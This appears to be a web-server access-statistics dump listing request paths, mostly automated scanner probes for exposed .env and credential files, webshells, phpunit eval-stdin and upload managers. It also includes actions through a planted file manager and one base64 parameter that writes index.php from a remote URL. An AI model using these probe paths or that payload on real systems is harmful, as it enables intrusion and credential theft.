29267995 0 0 29267995 0 /html/.env 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /_info.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /qa.php 1 0 0 0 3 0 0 29287566 0 0 29214293 0 /.env?165.232.149.232 1 0 0 0 1 0 0 29116976 0 0 29116976 0 /aws_credentials.json 1 0 0 0 3 0 0 29408500 0 0 29333397 0 /v4.php 1 1 0 0 0 28963684 0 0 28963684 0 0 362 /_autoindex/assets/js/tablesort.number.js?54.202.183.123 1 0 0 0 2 0 0 29153338 0 0 29126054 0 /vendor/laravel-filemanager/js/script.js 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /php-info.php 1 0 0 0 3 0 0 29282790 0 0 29181400 0 /backend/.env 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /lib.php 1 0 0 0 5 0 0 29385065 0 0 29370907 0 /X7x.php 1 0 0 0 5 0 0 29289527 0 0 29272324 0 /lib/.env 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /admin/function.php 1 0 0 0 1 0 0 29181374 0 0 29181374 0 /etc/postfix/main.cf 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /php52/phpinfo.php 1 0 0 0 10 0 0 29385065 0 0 29333397 0 /wa.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.project 1 0 0 0 5 0 0 29387855 0 0 29278602 0 /bypass.php 1 0 0 0 5 0 0 29416384 0 0 29365340 0 /wp-trackback.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /codicil.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-admin/network/wp-conflg.php?p= 1 0 0 0 6 0 0 29289527 0 0 29272324 0 /.remote 1 0 0 0 4 0 0 29408500 0 0 29278603 0 /z.php 1 0 0 0 16 0 0 28998139 0 0 28851352 0 /favicon.ico?54.202.183.123 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-content/plugins/admin.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /phpshell.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /test/.env 1 0 0 0 3 0 0 29360412 0 0 29333397 0 /0x0x.php 1 0 0 0 3 0 0 29416384 0 0 29333629 0 /php.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /an7.php 1 0 0 0 5 0 0 29385065 0 0 29356548 0 /opts.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /2%25.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /server/config/database.js 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env_1 1 0 0 0 1 0 0 29133699 0 0 29133699 0 /.svn/entries 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /aws.json 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /subversive_shell.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /main/.env 1 0 0 0 3 0 0 29401288 0 0 29145055 0 /wp-includes/ID3/license.txt 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /r79.php 1 0 0 0 3 0 0 29363929 0 0 29353668 0 /manager/assets/modext/core/modx.js 1 0 0 0 4 0 0 29363935 0 0 29353653 0 /manager/media/script/mootools/mootools.js 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /priv8.php 1 0 0 1 0 0 29250912 0 0 29250912 0 0 /akcc.php?p=.well-known&settings=1 1 0 0 0 2 0 0 29408500 0 0 29378026 0 /666.php 1 5 0 0 0 29373003 0 0 29373003 0 0 435 /.well-known/acme-challenge/RsXuyR1O3KKPFLQhtZiFbA3KFsSLTuMK33PmXPd9ZhU 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /admin/config 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /block-bindings.php 1 0 0 0 2 0 0 29408500 0 0 29333629 0 /mnkalo.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /laravel 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /u.php 1 0 0 0 16 0 0 29408500 0 0 29293088 0 /usep.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /env 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /my_env/newsletter.py 1 0 0 0 6 0 0 29408500 0 0 29293088 0 /lala.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-links-opml.php 1 0 0 0 2 0 0 29372535 0 0 29372535 0 /profile.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /AnonFox.php 1 0 0 0 3 0 0 29381387 0 0 29337748 0 /qing.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /debug/default/view 1 0 0 0 2 0 0 29250911 0 0 29250911 0 /.htaccess 1 0 0 0 7 0 0 29171762 0 0 28997105 0 /blog 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /wp-content/themes/aahana/json.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /index.js 1 0 0 0 1 0 0 29363935 0 0 29363935 0 /manager/media/script/mootools/mootools.js?46.101.225.202 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /staging/.env 1 0 0 0 4 0 0 29373838 0 0 29365340 0 /haikh.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /csv.php 1 33 0 0 0 29250911 0 0 28845585 0 0 13252 /_autoindex/assets/icons/folder-fill.svg 1 0 0 0 8 0 0 29408500 0 0 29293088 0 /cccc.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /assets/global/plugins/jquery-file-upload/server/php/ 1 0 0 0 1 0 0 29181349 0 0 29181349 0 /deployment-config.json 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /twso.php 1 0 0 0 1 0 0 29109070 0 0 29109070 0 /sftp-config.json?3.8.194.88 1 0 0 0 1 0 0 29265800 0 0 29265800 0 /blog/robots.txt 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /apis/config/config.js 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /components/components.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-includes/cs.php 1 0 0 0 13 0 0 29408500 0 0 29333397 0 /wfile.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /abc.php 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /.well-known/acme-challenge/?SA 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /zr.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /reverse_shell.php 1 0 0 0 5 0 0 29408500 0 0 29278603 0 /p.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 2 0 0 29387855 0 0 29375823 0 /nxx.php 1 0 0 0 3 0 0 29416384 0 0 29211741 0 /themes.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /lte7.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-content/uploads/yourfile.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-includes/template-loader.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-admin/includes/media.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /tools.php 1 0 0 0 5 0 0 29381387 0 0 29337748 0 /11.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29374986 0 0 29374986 0 /.git/refs/remotes/origin/HEAD 1 0 0 0 12 0 0 29385065 0 0 29333397 0 /alpa.php 1 0 0 0 2 0 0 29272325 0 0 29267995 0 /.env.save 1 0 0 0 2 0 0 29153338 0 0 29126054 0 /_ignition/execute-solution 1 0 0 0 2 0 0 29356079 0 0 29345118 0 /gel4y.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /cmd_access.php 1 0 0 0 3 0 0 29387855 0 0 29345118 0 /racs3.php 1 0 0 0 3 0 0 29282790 0 0 29267995 0 /appsettings.json 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /partner/config/config.js 1 0 0 0 10 0 0 29378026 0 0 29333397 0 /ilex.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /portal/.env 1 0 0 0 1 0 0 29250912 0 0 29250912 0 /akcc.php?edit=.htaccess&env=ace&p= 1 1 0 0 1 29250911 0 29250912 29250911 0 29250912 7882 /akcc.php?p=&view=.htaccess 1 0 0 0 2 0 0 29153336 0 0 29126052 0 /assets/js/kcfinder/upload.php 1 0 0 0 1 0 0 29211741 0 0 29211741 0 /ynz.PhP7 1 0 0 0 3 0 0 29373838 0 0 29333629 0 /xpass.php 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /phpinfos.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /config/constants.js 1 0 0 0 3 0 0 29282790 0 0 29267995 0 /.env.old 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /fifi.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /testphpinfo.php 1 1 0 0 0 29050910 0 0 29050910 0 0 362 /_autoindex/assets/js/tablesort.number.js?198.235.24.142 1 0 0 0 2 0 0 29408500 0 0 29387855 0 /filemanager.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /x0x.php 1 0 0 0 12 0 0 29408500 0 0 29293088 0 /CLA.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /images/g3.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /swagger/v1/swagger.json 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /f350.php 1 0 0 0 1 0 0 29333629 0 0 29333629 0 /zzz.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /api/config/config.yml 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /aucxzso.php 1 0 0 0 3 0 0 29371907 0 0 29333397 0 /tiny.php 1 0 0 0 1 0 0 29250064 0 0 29250064 0 /phpinfo=1 1 0 0 0 4 0 0 29408500 0 0 29278603 0 /k.php 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /.well-known/acme-challenge/?ND 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.php 1 0 0 0 8 0 0 29289527 0 0 29181401 0 /core/.env 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /smpx.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /css/xp.php 1 0 0 0 11 0 0 29416384 0 0 29293088 0 /520.php 1 0 0 0 1 0 0 29370173 0 0 29370173 0 /.git/?46.101.225.202 1 0 0 0 2 0 0 29250913 0 0 29250913 0 /akcc.php?p=&quickView=1&view=.htaccess 1 0 0 0 2 0 0 29333629 0 0 29293088 0 /C1.php 1 0 0 0 5 0 0 29416384 0 0 29333629 0 /new.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /my_env/chakaash.py 1 0 0 0 14 0 0 29373003 0 0 28845585 0 /config.json 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /main.yml 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /.well-known/acme-challenge/?MA 1 0 0 1 1 0 29250912 29250913 0 29250912 29250913 0 /akcc.php?del=akcc.php&p= 1 0 0 0 1 0 0 29087845 0 0 29087845 0 /sftp-config.json?198.235.24.142 1 0 0 0 24 0 0 29416384 0 0 28933444 0 /info.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-content/themes/admin.php 1 0 0 0 1 0 0 29024010 0 0 29024010 0 /favicon.ico?198.235.24.142 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /admin/index.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /assets/plugins/jquery-file-upload/server/php/ 1 0 0 0 14 0 0 29416384 0 0 29333397 0 /f35.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /file6.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /oiko6u.php 1 0 0 0 2 0 0 29408500 0 0 29386605 0 /sid3.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /en/.env 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /login 1 0 0 0 1 0 0 29181382 0 0 29181382 0 /etc/mail/sendmail.cf 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /api/shared/config/config.env 1 0 0 0 2 0 0 29346559 0 0 29333629 0 /wek.php 1 0 0 0 12 0 0 29408500 0 0 29333629 0 /444.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /filemanager/filemanager/dialog.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /dd1.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /f.php 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /NH19T66T.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.php_old2018 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.dist 1 0 0 0 2 0 0 29272325 0 0 29267995 0 /backend 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.php_old2016 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /tesla.php 1 0 0 0 4 0 0 29416384 0 0 29373838 0 /class9.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /logs/app.log 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.sample.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /secure_shell.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /config.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /wp-content/function.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /ww5.php 1 0 0 0 2 0 0 29368526 0 0 29333630 0 /zhidagen.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.php~1 1 0 0 0 7 0 0 29373003 0 0 28845585 0 /server 1 0 0 0 3 0 0 29408500 0 0 29333630 0 /nc.php 1 0 0 0 1 0 0 28942130 0 0 28942130 0 /ads.txt?54.202.183.123 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /wp-rss4.php 1 0 0 0 1 0 0 29278602 0 0 29278602 0 /r57.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config/database.json 1 0 0 0 4 0 0 29381387 0 0 29333397 0 /a1.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /.well-known/xin1.php?p 1 0 0 0 16 0 0 29408500 0 0 29293088 0 /file1.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.old 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /server-info.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /ru.php 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /Zeiss.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /view.php 1 0 0 0 3 0 0 29356079 0 0 29333397 0 /blex.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /siteinfo.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/extension/shipping.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /api/shared/.env 1 0 0 0 1 0 0 28896692 0 0 28896692 0 /shared/.git/config 1 0 0 0 3 0 0 29282790 0 0 29250064 0 /phpinfo 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/setting/store.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /zc.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /file48.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /bu5.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /exhitrgp.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /repair.php 1 0 0 0 2 0 0 29387855 0 0 29333397 0 /alam.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /wsback.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /elp.php 1 0 0 0 9 0 0 29408500 0 0 29278602 0 /a.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /vue_CRM/.env 1 0 0 0 1 0 0 29211741 0 0 29211741 0 /ws.php.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /krypton.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /gtc.php 1 0 0 0 4 0 0 29416384 0 0 29309619 0 /gg.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/common/header.php 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /up4.php 1 0 0 0 7 0 0 29385065 0 0 29356548 0 /wpo.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /search.php 1 0 0 0 1 0 0 29250913 0 0 29250913 0 /akcc.php?copy=.well-known/acme-challenge&p= 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /privileged_shell.php 1 0 0 0 2 0 0 29272325 0 0 29272324 0 /.gitconfig 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-admin/images/admin.php 1 0 0 0 2 0 0 29282790 0 0 29181378 0 /settings.py 1 2 0 0 0 29250911 0 0 29250911 0 0 17777 /akcc.php?p 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /node.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /dashboard/phpinfo.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /inc.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /phpunit/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29181371 0 0 29181371 0 /config/secrets.yml 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /env.backup 1 0 0 0 20 0 0 29401288 0 0 29024062 0 /cms/wp-includes/wlwmanifest.xml 1 2 2 0 0 29250911 0 0 29250911 0 0 1344 /.well-known/ 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /u6dex.php 1 0 0 0 5 0 0 29385065 0 0 29337748 0 /modules/mod_simplefileuploadv1.3/elements/filemanager.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /puts.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /byuri.php 1 0 0 0 2 0 0 29360411 0 0 29356548 0 /ab.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /f5.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /tools 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /getcpuutil.php-bakworking 1 0 0 0 4 0 0 29416384 0 0 29126052 0 /filemanager/dialog.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /kal.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wpp-config.php~ 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /cafe.php 1 0 0 0 1 0 0 29278604 0 0 29278604 0 /admin/controller/setting/setting.php 1 0 0 0 3 0 0 29378026 0 0 29293088 0 /class.1.php 1 0 0 0 2 0 0 29278604 0 0 29278604 0 /admin/controller/extension/extension.php 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /xampp/phpinfo 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /nope.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env.sample 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /xxx.php 1 0 0 0 2 0 0 29373838 0 0 29370907 0 /bless6.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /printenv.tmp 1 0 0 0 3 0 0 29378026 0 0 29293088 0 /hexx.php 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /vxrl.php 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /nginx/.env 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /aws-secret.yaml 1 1 0 0 0 29284982 0 0 29284982 0 0 64 /.well-known/acme-challenge/X4_QHQJVOV9U4Z9VMPYV7B9XMRO7CUIC?165.232.149.232 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /vxonb.php 1 0 0 0 1 0 0 29368526 0 0 29368526 0 /wp-content/cong.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-content/uploads/wp.php 1 12 12 0 1 29146838 0 29141406 29110573 0 29141406 10614 /?164.90.228.79 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /v2/api-docs 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /rdfe.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /get.php 1 0 0 0 1 0 0 29398488 0 0 29398488 0 /js/fm.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /api/gql 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /exapi/.env 1 2 0 0 0 29250911 0 0 29250911 0 0 16606 /akcc.php?p=cgi-bin 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /secured/phpinfo.php 1 1 0 0 0 28933442 0 0 28933442 0 0 64 /.well-known/acme-challenge/QU6URW_LYAALY8ZSFS3EJA76EVCIY2_V 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /wpc1.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /coloradmin/assets/plugins/jquery-file-upload/server/php/ 1 0 0 0 3 0 0 29387855 0 0 29333630 0 /zc-749.php 1 0 0 0 6 0 0 29408500 0 0 29333630 0 /asd67.php 1 0 0 0 1 0 0 29250912 0 0 29250912 0 /akcc.php?edit=.htaccess&p= 1 0 0 0 2 0 0 29373003 0 0 29282790 0 /swagger.json 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /api-docs/swagger.json 1 0 0 0 1 0 0 28900278 0 0 28900278 0 /robots.txt?54.202.183.123 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /zero.php 1 0 0 0 20 0 0 29416384 0 0 29309619 0 /222.php 1 0 0 0 2 0 0 29375823 0 0 29333629 0 /ff.php 1 0 0 0 2 0 0 29153337 0 0 29126053 0 /js/tinymce4/plugins/filemanager/dialog.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /rjv.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /wp-content/uploads/wp-conflg.php 1 0 0 0 2 0 0 29356079 0 0 29345118 0 /akpc.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /fass.php 1 63 63 0 0 29346541 0 0 29136543 0 0 53277 /?165.232.149.232 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /images/m.php 1 0 0 0 1 0 0 29309619 0 0 29309619 0 /jx.php 1 0 0 0 3 0 0 29378026 0 0 29293088 0 /gfile1.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /sid.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /environment 1 0 0 0 4 0 0 29416384 0 0 29211739 0 /wp-content/plugins/index.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /cra.php 1 0 0 0 1 0 0 29309619 0 0 29309619 0 /acxx.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /Anon.php 1 0 0 0 21 0 0 29401288 0 0 29024062 0 /wordpress/wp-includes/wlwmanifest.xml 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /.env.stage 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /lara/info.php 1 0 0 0 1 0 0 29278603 0 0 29278603 0 /wp-content/plugins/yourplugin/yourplugin.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /term.php 1 0 0 0 2 0 0 29360412 0 0 29356548 0 /x0.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-content/debug.log 1 0 0 0 3 0 0 29102613 0 0 29004220 0 /ads.txt?198.235.24.142 1 0 0 0 5 0 0 29408500 0 0 29293088 0 /jmfi2.php 1 0 0 0 8 0 0 29416384 0 0 29210008 0 /cong.php 1 0 0 0 2 0 0 29333630 0 0 29333629 0 /wo.php 1 1 0 0 0 28845583 0 0 28845583 0 0 64 /.well-known/acme-challenge/NDD_ZCM5UIPL-K31UZ-77WTBXZZ5A76T 1 0 0 0 6 0 0 29408500 0 0 29293088 0 /file32.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /btex.php 1 0 0 0 1 0 0 29293088 0 0 29293088 0 /zex4.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /update/f35.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /wp-admin/maint/about.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /trd.php 1 0 0 0 3 0 0 29381386 0 0 29337748 0 /zews.php 1 0 0 0 1 0 0 29408500 0 0 29408500 0 /static/sallu.php 1 0 0 0 4 0 0 29373838 0 0 29365340 0 /size.php?p= 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /la.php 1 0 0 0 3 0 0 29408500 0 0 29378026 0 /js.php 1 0 0 0 1 0 0 29288272 0 0 29288272 0 /config.php|/.env|settings.py 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /public/js/main.js 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /wsr2.php?p= 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /winkel.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /simp.php 1 0 0 0 1 0 0 29211738 0 0 29211738 0 /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJ2luZGV4LnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHBzOi8vcmVudHJ5LmNvLzh1cW9uOGh6L3JhdycpKTs= 1 0 0 0 1 0 0 29250912 0 0 29250912 0 /akcc.php?copy=cgi-bin&finish=1&move=1&p= 1 0 0 0 1 0 0 29386605 0 0 29386605 0 /iko.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /sx_pms.php 1 0 0 0 2 0 0 29368526 0 0 29333629 0 /jf1d22.php 1 0 0 0 5 0 0 29289527 0 0 29272325 0 /database/.env 1 0 0 0 4 0 0 29408500 0 0 29309619 0 /r4f_1.php 1 0 0 0 6 0 0 29416384 0 0 29228734 0 /inputs.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /news-app/.env 1 5 0 0 0 29197145 0 0 29197145 0 0 435 /.well-known/acme-challenge/fTAaMfJGGVcEkooIW0Uo8aoB3oROFcOoTlpnFb7lml8 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /wj.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /oddtd.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /ubh.php 1 0 0 0 1 0 0 29181367 0 0 29181367 0 /config/databases.yml 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /oiepfuav.php 1 0 0 0 3 0 0 29386605 0 0 29333630 0 /okxoby.php 1 1 0 0 0 29373002 0 0 29373002 0 0 64 /.well-known/acme-challenge/HO0F-ODTHDOYZTP11EIT3R_96FDD6PJQ 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /cloud/Scraper.js 1 0 0 0 1 0 0 29282790 0 0 29282790 0 /_phpinfo.php 1 0 0 0 3 0 0 29374986 0 0 29272323 0 /.git/refs/heads/main 1 0 0 0 2 0 0 29360411 0 0 29356548 0 /aghbvr.php 1 0 0 0 8 0 0 29387855 0 0 29309619 0 /ee.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /config/mail.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.env_bak 1 0 0 0 12 0 0 29385065 0 0 29333397 0 /classgoto24.php 1 0 0 0 5 0 0 29289528 0 0 29282790 0 /site/.env 1 0 0 0 1 0 0 29373838 0 0 29373838 0 /adin.php 1 0 0 0 1 0 0 29387855 0 0 29387855 0 /wp-su.php 1 0 0 0 8 0 0 29387855 0 0 29293088 0 /cfile.php 1 0 0 0 3 0 0 29381387 0 0 29337748 0 /pepe.php 1 0 0 0 1 0 0 29267994 0 0 29267994 0 /.env-example 1 0 0 0 1 0 0 29378026 0 0 29378026 0 /pwnd.php 1 0 0 0 2 0 0 29416384 0 0 29398488 0 /.well-known/acme-challenge/index.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /qufsq.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /api/info 1 0 0 0 2 0 0 29153337 0 0 29126052 0 /assets/admin/tinymce/plugins/filemanager/dialog.php 1 0 0 0 1 0 0 29272325 0 0 29272325 0 /app 1 0 0 0 2 0 0 29278602 0 0 29211739 0 /wp-includes/install.php 1 0 0 0 2 0 0 29408500 0 0 29368526 0 /gdn.php 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /Marvins.php 1 0 0 0 4 0 0 29289528 0 0 29285802 0 /uploads/.env 1 0 0 0 1 0 0 29416384 0 0 29416384 0 /pop.php 1 0 0 0 1 0 0 29373003 0 0 29373003 0 /swagger/swagger-ui.html 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /rd1.php 1 0 0 0 1 0 0 29333397 0 0 29333397 0 /pn.php 1 0 0 0 3 0 0 29373003 0 0 29267995 0 /api 1 0 0 0 2 0 0 29153338 0 0 29126053 0 /formcraft/file-upload/server/php/ 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /0.0_phpinfo.php 1 0 0 0 4 0 0 29373838 0 0 29365340 0 /135.php 1 0 0 0 1 0 0 29346559 0 0 29346559 0 /d3.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /.jenv-version 1 0 0 0 16 0 0 29387855 0 0 29293088 0 /we.php 1 0 0 0 8 0 0 29370906 0 0 29333397 0 /klex.php 1 0 0 0 2 0 0 29282790 0 0 29267995 0 /local/.env 1 0 0 0 2 0 0 29153337 0 0 29126052 0 /plugins/kcfinder/upload.php 1 0 0 0 15 0 0 29408500 0 0 29333397 0 /file21.php 1 0 0 0 2 0 0 29374986 0 0 29272323 0 /.git/refs/heads/master 1 0 0 0 1 0 0 29375823 0 0 29375823 0 /20025.php 1 0 0 0 1 0 0 29356079 0 0 29356079 0 /H.php 1 0 0 0 1 0 0 29346558 0 0 29346558 0 /fai.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.6 1 0 0 0 5 0 0 29398488 0 0 29337748 0 /13k.php 1 0 0 0 1 0 0 29267995 0 0 29267995 0 /wp-config.5 